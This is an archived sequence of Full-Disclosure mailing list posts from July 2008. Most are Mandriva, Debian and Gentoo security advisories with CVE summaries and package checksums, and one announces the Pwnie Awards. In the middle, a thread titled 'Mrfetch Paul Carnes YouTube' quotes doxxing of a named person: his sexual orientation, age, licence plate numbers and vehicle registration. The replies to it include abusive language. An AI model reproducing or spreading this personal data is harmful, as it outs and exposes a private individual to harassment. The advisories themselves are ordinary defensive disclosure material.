Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:133 http://www.mandriva.com/security/ _______________________________________________________________________ Package : sympa Date : July 4, 2008 Affected: Corporate 4.0 _______________________________________________________________________ Problem Description: A denial of service condition was discovered in Sympa versions prior to 5.4 that allowed remote attackers to crash the Sympa daemon via a malformed email message (CVE-2008-1648). The updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1648 _______________________________________________________________________ Updated Packages: Corporate 4.0: 655a68493320ad7bb781763f2e772a8f corporate/4.0/i586/sympa-5.1.0-2.1.20060mlcs4.i586.rpm 2abfb52172b7becbb926bd6cf8f63693 corporate/4.0/SRPMS/sympa-5.1.0-2.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 6e2632d45d6f4474665457aef2d7574f corporate/4.0/x86_64/sympa-5.1.0-2.1.20060mlcs4.x86_64.rpm 2abfb52172b7becbb926bd6cf8f63693 corporate/4.0/SRPMS/sympa-5.1.0-2.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIbn2pmqjQ0CJFipgRAjU4AKDruMtTUyjhioGwVY7fC9JpfFMEmwCgnISg K71LnRteysY9RFwbHyNy05U= =zzr/ -----END PGP SIGNATURE----- From security at mandriva.com Sat Jul 5 01:27:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Jul 2008 18:27:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:134 ] - Updated squid packages fix DoS vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:134 http://www.mandriva.com/security/ _______________________________________________________________________ Package : squid Date : July 4, 2008 Affected: 2007.1, 2008.0, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 _______________________________________________________________________ Problem Description: An incorrect fix for CVE-2007-6239 resulted in Squid not performing proper bounds checking when processing cache update replies. Because of this, a remote authenticated user might have been able to trigger an assertion error and cause a denial of service (CVE-2008-1612). The updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1612 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.1: 248155a42ab8820fd29fce25995949bf 2007.1/i586/squid-2.6.STABLE7-2.2mdv2007.1.i586.rpm 33503f35607e909e7fcb1ab9be98915e 2007.1/i586/squid-cachemgr-2.6.STABLE7-2.2mdv2007.1.i586.rpm 0fb7e375fa1eb5508d4f87f152eb75f1 2007.1/SRPMS/squid-2.6.STABLE7-2.2mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: ce99e5e402516f30ebd675cbb8ad45fa 2007.1/x86_64/squid-2.6.STABLE7-2.2mdv2007.1.x86_64.rpm 72697993236ec0a4061b3142bc91f7ee 2007.1/x86_64/squid-cachemgr-2.6.STABLE7-2.2mdv2007.1.x86_64.rpm 0fb7e375fa1eb5508d4f87f152eb75f1 2007.1/SRPMS/squid-2.6.STABLE7-2.2mdv2007.1.src.rpm Mandriva Linux 2008.0: 8db0c7927b559eeae600de6cbb824028 2008.0/i586/squid-2.6.STABLE16-1.3mdv2008.0.i586.rpm 0bd46c74785037fb1cb126be08fefd25 2008.0/i586/squid-cachemgr-2.6.STABLE16-1.3mdv2008.0.i586.rpm a1827941570c11ed67cced2dc03c3087 2008.0/SRPMS/squid-2.6.STABLE16-1.3mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 00768d35f3492d087788160b33faeca1 2008.0/x86_64/squid-2.6.STABLE16-1.3mdv2008.0.x86_64.rpm a4f7b01925d6638736a14301a88f6327 2008.0/x86_64/squid-cachemgr-2.6.STABLE16-1.3mdv2008.0.x86_64.rpm a1827941570c11ed67cced2dc03c3087 2008.0/SRPMS/squid-2.6.STABLE16-1.3mdv2008.0.src.rpm Corporate 3.0: 06592ba582a05df6863bae3ee194e24c corporate/3.0/i586/squid-2.5.STABLE9-1.9.C30mdk.i586.rpm 4711ba95422fa835f4fd6ad01db41e62 corporate/3.0/SRPMS/squid-2.5.STABLE9-1.9.C30mdk.src.rpm Corporate 3.0/X86_64: 885b67df0ca072442a0355ea2fe11ac5 corporate/3.0/x86_64/squid-2.5.STABLE9-1.9.C30mdk.x86_64.rpm 4711ba95422fa835f4fd6ad01db41e62 corporate/3.0/SRPMS/squid-2.5.STABLE9-1.9.C30mdk.src.rpm Corporate 4.0: f294de04b7285866c8c8bd1fc501a37e corporate/4.0/i586/squid-2.6.STABLE1-4.5.20060mlcs4.i586.rpm 7eec6fef4bf1be7356323340c758a242 corporate/4.0/i586/squid-cachemgr-2.6.STABLE1-4.5.20060mlcs4.i586.rpm 48b89f934fd21bea7c454ef507277017 corporate/4.0/SRPMS/squid-2.6.STABLE1-4.5.20060mlcs4.src.rpm Corporate 4.0/X86_64: 9409f71fc022129de41ef2882be751e9 corporate/4.0/x86_64/squid-2.6.STABLE1-4.5.20060mlcs4.x86_64.rpm 036c98b8a72a3e283a96b6166ca73024 corporate/4.0/x86_64/squid-cachemgr-2.6.STABLE1-4.5.20060mlcs4.x86_64.rpm 48b89f934fd21bea7c454ef507277017 corporate/4.0/SRPMS/squid-2.6.STABLE1-4.5.20060mlcs4.src.rpm Multi Network Firewall 2.0: ec9e5eea1dd1a5ff7a074c727bb27543 mnf/2.0/i586/squid-2.5.STABLE9-1.9.C30mdk.i586.rpm 795c5d666cff5af8e0912cbb1f2bfe4c mnf/2.0/SRPMS/squid-2.5.STABLE9-1.9.C30mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIbpQAmqjQ0CJFipgRAsR+AJ4g5qnBkSyeSivUD+xaP0Yl8ZqpvACfcSc0 XDy1eYKV1xhQ1PVS+6JR73g= =xqb/ -----END PGP SIGNATURE----- From security at mandriva.com Sat Jul 5 04:17:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Jul 2008 21:17:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:135 ] - Updated gnome-screensaver packages fix authentication vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:135 http://www.mandriva.com/security/ _______________________________________________________________________ Package : gnome-screensaver Date : July 4, 2008 Affected: 2008.0 _______________________________________________________________________ Problem Description: A vulnerability was found in gnome-screensaver 2.20.0 that could possibly allow a local user to read the clipboard contents and X selection data for a locked session by using CTRL-V (CVE-2007-6389). The updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6389 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 5d98cc0c0e53e330152467813ebc75d5 2008.0/i586/gnome-screensaver-2.20.0-2.2mdv2008.0.i586.rpm b9168aa13b1157d3d3e39e73d141aec6 2008.0/SRPMS/gnome-screensaver-2.20.0-2.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 72c1d0b2290a5e325f53b7b69d98c9ef 2008.0/x86_64/gnome-screensaver-2.20.0-2.2mdv2008.0.x86_64.rpm b9168aa13b1157d3d3e39e73d141aec6 2008.0/SRPMS/gnome-screensaver-2.20.0-2.2mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIbr1OmqjQ0CJFipgRAkjZAKClXVE/9WNz8HXdHC9of1f42KkQZACeNlB/ w+N6ZRSimCJm8DsZQ3Zq81E= =mSMX -----END PGP SIGNATURE----- From fw at deneb.enyo.de Sat Jul 5 13:37:12 2008 From: fw at deneb.enyo.de (Florian Weimer) Date: Sat, 05 Jul 2008 14:37:12 +0200 Subject: [Full-disclosure] [SECURITY] [DSA 1602-1] New pcre3 packages fix arbitrary code execution Message-ID: <877ic04idj.fsf@mid.deneb.enyo.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1602-1 security at debian.org http://www.debian.org/security/ Florian Weimer July 05, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : pcre3 Vulnerability : buffer overflow Problem type : local (remote) Debian-specific: no CVE Id(s) : CVE-2008-2371 Tavis Ormandy discovered that PCRE, the Perl-Compatible Regular Expression library, may encounter a heap overflow condition when compiling certain regular expressions involving in-pattern options and branches, potentially leading to arbitrary code execution. For the stable distribution (etch), this problem has been fixed in version 6.7+7.4-4. For the unstable distribution (sid), this problem has been fixed soon. We recommend that you upgrade your pcre3 packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/p/pcre3/pcre3_6.7+7.4-4.dsc Size/MD5 checksum: 888 9ef88cd7ab592b3799211018f8d20f63 http://security.debian.org/pool/updates/main/p/pcre3/pcre3_6.7+7.4-4.diff.gz Size/MD5 checksum: 83574 2d9686b5b3a5480aa528bd89cdea12a6 http://security.debian.org/pool/updates/main/p/pcre3/pcre3_6.7+7.4.orig.tar.gz Size/MD5 checksum: 1106897 de886b22cddc8eaf620a421d3041ee0b alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-4_alpha.deb Size/MD5 checksum: 21038 72545720bee988d70381cf56ac08ab3e http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-4_alpha.deb Size/MD5 checksum: 91302 039876d52014e88686119445734f6ec7 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-4_alpha.deb Size/MD5 checksum: 264154 19f60bc08e3f2a5d8ca305851f44ef55 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-4_alpha.deb Size/MD5 checksum: 209168 f19f07f81f4b9259c7b061faf7d9fc7c amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-4_amd64.deb Size/MD5 checksum: 89984 c92634b92f00d7f41991d58d3ad690bc http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-4_amd64.deb Size/MD5 checksum: 198552 2760ab9ccf2cdf8b7fec89e4068feba7 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-4_amd64.deb Size/MD5 checksum: 250032 68f3c4360bc41358bb97f546bcb0e3ce http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-4_amd64.deb Size/MD5 checksum: 20150 9bed90914b31ea7f11810c3b99d5b5c6 arm architecture (ARM) http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-4_arm.deb Size/MD5 checksum: 88966 41f8ee2780754174274009055c952079 http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-4_arm.deb Size/MD5 checksum: 19920 f10b8d7a5c6366136813af67d0a8b7ff http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-4_arm.deb Size/MD5 checksum: 243970 8becd101006adf3dfca88607c07d3086 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-4_arm.deb Size/MD5 checksum: 198322 b2c55ac5d7a2be62c5b5e8cb6d0c48f2 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-4_hppa.deb Size/MD5 checksum: 92266 b9236279f24acead3acfed524d87d1bd http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-4_hppa.deb Size/MD5 checksum: 255722 f0a3084a3683ece8f0c10ffd937ef252 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-4_hppa.deb Size/MD5 checksum: 202446 5e552d19b502810cf640eb8c11776736 http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-4_hppa.deb Size/MD5 checksum: 20726 aa317ebe8c30e18966b3786acc1398b9 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-4_i386.deb Size/MD5 checksum: 89862 60a49383c76120d08e4d300564b659db http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-4_i386.deb Size/MD5 checksum: 246934 b20ff56ba4289860f1d09a75abfa3505 http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-4_i386.deb Size/MD5 checksum: 19348 dcded2ff2a56d461e522ac11647ab4f2 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-4_i386.deb Size/MD5 checksum: 196894 30a9803ec2c737702228c88b121d1544 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-4_ia64.deb Size/MD5 checksum: 230688 264ad5d5665e602b2f692b899fd0a5e9 http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-4_ia64.deb Size/MD5 checksum: 25658 538af9aabca0427844e955f028c050e4 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-4_ia64.deb Size/MD5 checksum: 280674 e4d8e19abeed7202102e94597c4798e8 http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-4_ia64.deb Size/MD5 checksum: 93858 c6cf88e6acf726bd4179658e0f2bbe9e mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-4_mips.deb Size/MD5 checksum: 198430 ac574108ba4f6ae4b70179b7d6b5d7c9 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-4_mips.deb Size/MD5 checksum: 253526 77b402e25c797abf1f7557e106326667 http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-4_mips.deb Size/MD5 checksum: 90538 e1671c5b76cca0256a8d41b8f9e419e3 http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-4_mips.deb Size/MD5 checksum: 20424 766ce624fa24e42d04b53511e1cbed21 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-4_mipsel.deb Size/MD5 checksum: 90520 2dc1625becce40f479e50fdcf075571b http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-4_mipsel.deb Size/MD5 checksum: 252396 52692425252b9c4263fb2899918d0966 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-4_mipsel.deb Size/MD5 checksum: 197616 f228905aa01a3ae35801dc9b9b12c0ef http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-4_mipsel.deb Size/MD5 checksum: 20454 e991967c20b95fe40b0f45acd9eafa1d powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-4_powerpc.deb Size/MD5 checksum: 197676 2debc2e40a4b17f562f82e5304ce8f4a http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-4_powerpc.deb Size/MD5 checksum: 253048 e442f8398410b41db288e77c36b4cd5f http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-4_powerpc.deb Size/MD5 checksum: 92152 bd22696efa2ad001a602c73d614f046c http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-4_powerpc.deb Size/MD5 checksum: 21270 88d9a6a11ccb43ad9d7e2f6418875619 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-4_s390.deb Size/MD5 checksum: 200044 6476b48137e32a76c3c85b09a901c0bc http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-4_s390.deb Size/MD5 checksum: 90586 de5f46464693e513d4045c0e037585ab http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-4_s390.deb Size/MD5 checksum: 20108 cdd1618521e5e64d04e5e26a49803b4f http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-4_s390.deb Size/MD5 checksum: 248498 4de3715c9a55f4aa0ba33fcde49ee7cd sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-4_sparc.deb Size/MD5 checksum: 197656 06f3298311fba7fb8bb4a072372c79b4 http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-4_sparc.deb Size/MD5 checksum: 19420 a4c54f7f457816b8e1f087055e959e23 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-4_sparc.deb Size/MD5 checksum: 247278 7c41012b79be5869fcf03f6c71be98b0 http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-4_sparc.deb Size/MD5 checksum: 88798 5905a7ee0d9a17c564ef929655fd8cd7 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iQEVAwUBSG9qy797/wQC1SS+AQLgTAf/YR4rAg05rv0thz4uNk7G5kXEX1lvYB21 ZqCENxEqQGSQIu9Zm3ciyUwtzqeVljzb2crPN5uZmLtQvxYCjQtsHYINc0tEyNhD vsnBKn1Qb8uN+mgMNRnhWE59cwGJJB9r+f6ni366lsJYORcuGwRsy5zH/wA1DWGt oTun+1d/0CQU6yGGnqrIuHKrCO8XYPAShAyJUdXyuh/L2jpwCOjIB3x9j1AoDk5C 8z6ZssI1BtOy3SdPxALlJpNP7gi54DrvBnskieJKVxcZv7xe7p7GP8IJI3oK7zNe I8Ne8xxYrhGtonZEM9txhfuxHucw1LLsNMqTJturHxA+GTf4y9pnJw== =ifkq -----END PGP SIGNATURE----- From thijs at debian.org Fri Jul 4 08:16:56 2008 From: thijs at debian.org (Thijs Kinkhorst) Date: Fri, 4 Jul 2008 09:16:56 +0200 (CEST) Subject: [Full-disclosure] [SECURITY] [DSA 1601-1] New wordpress packages fix several vulnerabilities Message-ID: <20080704071656.2DC06326F4A@morgana.loeki.tv> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1601-1 security at debian.org http://www.debian.org/security/ Thijs Kinkhorst July 04, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : wordpress Vulnerability : several Problem type : remote Debian-specific: no CVE Id(s) : CVE-2007-1599 CVE-2008-0664 Debian Bug : 437085 464170 Several remote vulnerabilities have been discovered in Wordpress, the weblog manager. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2007-1599 WordPress allows remote attackers to redirect authenticated users to other websites and potentially obtain sensitive information. CVE-2008-0664 The XML-RPC implementation, when registration is enabled, allows remote attackers to edit posts of other blog users. For the stable distribution (etch), these problems have been fixed in version 2.0.10-1etch3. For the unstable distribution (sid), these problems have been fixed in version 2.3.3-1. We recommend that you upgrade your wordpress package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10.orig.tar.gz Size/MD5 checksum: 520314 e9d5373b3c6413791f864d56b473dd54 http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch3.dsc Size/MD5 checksum: 891 d925a63731976b72ad35e4c1805623bf http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch3.diff.gz Size/MD5 checksum: 46073 486916bd4fc6463181eaba84fdc2db31 Architecture independent packages: http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch3_all.deb Size/MD5 checksum: 527158 280ba949f5c38079d2209a468697fb00 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iQEVAwUBSG3OXGz0hbPcukPfAQKS9QgAlFpafzarPjVU4EUuxx2hlN0xcL6pvgMD 8kj7LlaU+6CU2roiQ9OVbFg7lXT0JK5DfGjlhd+ptFyoodfJacEltPWGrbACEnDS 50BX48+24cjlQYBuYsmY5SpdAiH9kwe1LYQVjkGnSDRnbR2iZmIR264tQ1f0VhIA Fq6XXUH2jU5rFTc0w5+4o1gfL+0INhnANR8NdTWHT13LY3lXQpnZ/LxaEllAjRgx AV2AiO39anV5gwrDBg5ypinxQ3JhhlQmzxIOCBD946E/wySGarA7aF2xAbKtiSAS WNtzGUtoVlUB8DGrEGNv+JT9jrQAuiK+nQ9xu+uBqz85VYzy10iGPw== =fsW/ -----END PGP SIGNATURE----- From socketpuppetsftw at gmail.com Sun Jul 6 00:19:30 2008 From: socketpuppetsftw at gmail.com (Sock Puppet) Date: Sat, 5 Jul 2008 19:19:30 -0400 Subject: [Full-disclosure] Mrfetch Paul Carnes YouTube Message-ID: [ The contents of this message have been deleted from the Full-Disclosure archive in response to a request of a legal nature. ] From neilm at debian.org Sun Jul 6 12:46:49 2008 From: neilm at debian.org (Neil McGovern) Date: Sun, 6 Jul 2008 12:46:49 +0100 Subject: [Full-disclosure] Mrfetch Paul Carnes YouTube In-Reply-To: References: Message-ID: <20080706114649.GA26620@mx0.halon.org.uk> On Sat, Jul 05, 2008 at 07:19:30PM -0400, Sock Puppet wrote: > Mrfetch (Paul Carnes) is a homosexual What the hell does this have to do with his technical views? > Relatives: Fuck off and die. Love, Neil -- A. Because it breaks the logical sequence of discussion Q. Why is top posting bad? gpg key - http://www.halon.org.uk/pubkey.txt ; the.earth.li B345BDD3 From londone at hushmail.com Sun Jul 6 15:28:44 2008 From: londone at hushmail.com (londone at hushmail.com) Date: Sun, 06 Jul 2008 08:28:44 -0600 Subject: [Full-disclosure] Mrfetch Paul Carnes YouTube Message-ID: <20080706142845.D5696D032E@mailserver10.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Sat Jul 05 2008 - 18:19:30 CDT, Sock Puppet wrote: > REGISTRATION INFORMATION ****** > > Original Registration Date: 3/17/1997 Registration Date: 3/17/1997 ...... > Plate Number: 63BY204 Plate State: ALABAMA Plate Type: PRIVATE Vehicle's > Previous Plate Number: 63APS45 Vehicle's Previous Plate State: > ALABAMA ...... > > Status: Single Orientation: Gay Age: 23 Zodiac Sign: Aries (Mar 21 - > Apr 19) if he is 23 today then he was 12 when he titled his car in 1997. alabama may be full of bible thumping inbred hicks but few of them owned cars when they were 12. alabama minimum age for drivers is 15. http://golocalnet.com/drivingage/ > Model Year: 1989 Manufacturer: FORD Model: ESCORT 4D Vehicle Series: LX perhaps you are just upset that he drives a ford and not a buick. fw -----BEGIN PGP SIGNATURE----- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkhw1p0ACgkQ7o1mUuE8XVq58QQAhU6TO/w8UDFoyZty1BfFy/Xr74zv qTc12t3HB4BQ5aGH5J7nnqYjzpxIMbhgUPkXeekRWgPTeY8PJIYdSkXJEFeCjd9LyTTM 7lfDFZkai0cZA1si7KLs3fh45AgeggqQs9O6cy9CpxhwP/MYasYGQoQReKoNADgPXqMt RMqb1ns= =dIfm -----END PGP SIGNATURE----- -- Enter for Your Chance to WIN* The TotalBeauty.com Summer Spa Sweepstakes! http://tagline.hushmail.com/fc/JKFkuIjyZ563qePQA7KI8lD10mBfbG9LGZ2Wp1Xc6CkrscoghtWiNq/ From rbu at gentoo.org Mon Jul 7 21:34:53 2008 From: rbu at gentoo.org (Robert Buchholz) Date: Mon, 7 Jul 2008 22:34:53 +0200 Subject: [Full-disclosure] [ GLSA 200807-03 ] PCRE: Buffer overflow Message-ID: <200807072235.03287.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200807-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: PCRE: Buffer overflow Date: July 07, 2008 Bugs: #228091, #230039 ID: 200807-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== A buffer overflow vulnerability has been discovered in PCRE, allowing for the execution of arbitrary code and a Denial of Service. Background ========== PCRE is a Perl-compatible regular expression library. GLib includes a copy of PCRE. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-libs/libpcre < 7.7-r1 >= 7.7-r1 2 dev-libs/glib < 2.16.3-r1 >= 2.16.3-r1 < 2.14.0 ------------------------------------------------------------------- 2 affected packages on all of their supported architectures. ------------------------------------------------------------------- Description =========== Tavis Ormandy of the Google Security team reported a heap-based buffer overflow when compiling regular expression patterns containing "Internal Option Settings" such as "(?i)". Impact ====== A remote attacker could exploit this vulnerability by sending a specially crafted regular expression to an application making use of the PCRE library, which could possibly lead to the execution of arbitrary code or a Denial of Service. Workaround ========== There is no known workaround at this time. Resolution ========== All PCRE users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/libpcre-7.7-r1" All GLib users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/glib-2.16.3-r1" References ========== [ 1 ] CVE-2008-2371 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2371 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200807-03.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 827 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080707/ac3ea65b/attachment.bin From alex at sotirov.net Tue Jul 8 09:40:14 2008 From: alex at sotirov.net (Alexander Sotirov) Date: Tue, 8 Jul 2008 01:40:14 -0700 Subject: [Full-disclosure] Pwnie Awards 2008 Message-ID: <20080708084014.GA548@dsl093-068-005.sfo1.dsl.speakeasy.net> The Pwnie Awards ceremony will return to the BlackHat USA 2008 conference in Las Vegas. Last year's inagural event was a lot of fun, and we hope it will only get better. What should you expect from this year's ceremony? Exciting new categories, an inspirational acceptance speech by the winner of the Lamest Vendor Award and a special sing-along lead by HD Moore! The Pwnie Awards is an annual awards ceremony celebrating the achivements and failures of security researchers and the wider security community. We're currently accepting nominations in nine award categories, including two new ones for this year: * Best Server-Side Bug * Best Client-Side Bug * Mass 0wnage * Most Innovative Research * Lamest Vendor Response * Most Overhyped Bug * Best Song * Most Epic FAIL (new for 2008) * Lifetime Achievement award for hackers over 30 (new for 2008) The deadline for nominations is Monday, July 14. To submit a nomination, visit the Pwnie Awards site at http://pwnie-awards.org/ For questions, please email info at pwnie-awards.org Alexander Sotirov -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 194 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080708/a3e05de5/attachment.bin From jessicasaulhope at googlemail.com Tue Jul 8 17:59:06 